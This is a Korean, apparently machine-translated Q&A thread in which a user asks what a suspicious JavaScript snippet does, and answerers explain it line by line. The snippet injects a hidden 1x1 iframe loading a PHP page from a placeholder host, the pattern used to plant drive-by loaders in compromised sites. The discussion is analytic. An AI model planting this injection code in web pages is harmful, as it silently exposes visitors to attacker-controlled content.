2. 질의 응답
  3. 악의적 인 자바 스크립트 코드

악의적 인 자바 스크립트 코드

2013-04-05 6 views
0

이 악의적 인 자바 스크립트 코드는 정확히 무엇을 수행합니까?악의적 인 자바 스크립트 코드

(function() { 
    var qk = document.createElement('iframe'); 

    qk.src = 'http://xxx.tld/wp-includes/dtd.php'; 
    qk.style.position = 'absolute'; 
    qk.style.border = '0'; 
    qk.style.height = '1px'; 
    qk.style.width = '1px'; 
    qk.style.left = '1px'; 
    qk.style.top = '1px'; 

    if (!document.getElementById('qk')) { 
     document.write('<div id=\'qk\'></div>'); 
     document.getElementById('qk').appendChild(qk); 
    } 
})();

웹 사이트 http://xxx.tld/wp-includes/dtd.php은 확인을 반환합니다.

출처

2013-04-05 user1529891

답변

3

때문이다 :는 Iframe은 DOM 주입되면

(function() { 
    var qk = document.createElement('iframe'); // creating an iframe 

    qk.src = 'http://xxx.tld/wp-includes/dtd.php'; // pointing it at a webpage 

    /* 
    making the iframe only take up a 1px by 1px square 
    in the top left-hand corner of the web page it is injected into 
    */ 
    qk.style.position = 'absolute'; 
    qk.style.border = '0'; 
    qk.style.height = '1px'; 
    qk.style.width = '1px'; 
    qk.style.left = '1px'; 
    qk.style.top = '1px'; 

    /* 
    Adding the iframe to the DOM by creating a <div> with an ID of "qt" 
    (If the div has not been created already) 
    */  
    if (!document.getElementById('qk')) { 
     document.write('<div id=\'qk\'></div>'); 
     document.getElementById('qk').appendChild(qk); 
    } 
})();

브라우저가 http://xxx.tld/etc에 요청하는 것이다. 사이트에서 조회수를 추적하는 것이 가장 가능성이 큽니다.

출처

2013-04-05 03:29:45

+1

1 x 1 크기의 캐치. 나는 PHP 확장을 보았을 때 과거를 바람 피웠다. – BentOnCoding

+0

PHP 확장이 얼마나 좋을까요? 어떤 것도 다운로드하지 않으면 어떤 종류의 악의가 생길 수 있습니까? –

0

iframe을 열고 PHP 스크립트를 실행합니다.

아마 누가 무엇을 압니까?

또한 id가 qk 인 div가 필요합니다. 아마도 다른 잘못된 코드를 주입 ​​할 수 있습니다.

출처

2013-04-05 03:29:00 BentOnCoding

+0

롤 vm에서 페이지를 열고 스크립트가 수행하는 것을 확인하십시오. – BentOnCoding

+0

웹에서 스크립트를 읽을 수는 있지만 컴퓨터에서 이러한 URL을 열지 않습니다. – BentOnCoding

관련 문제

 관련 문제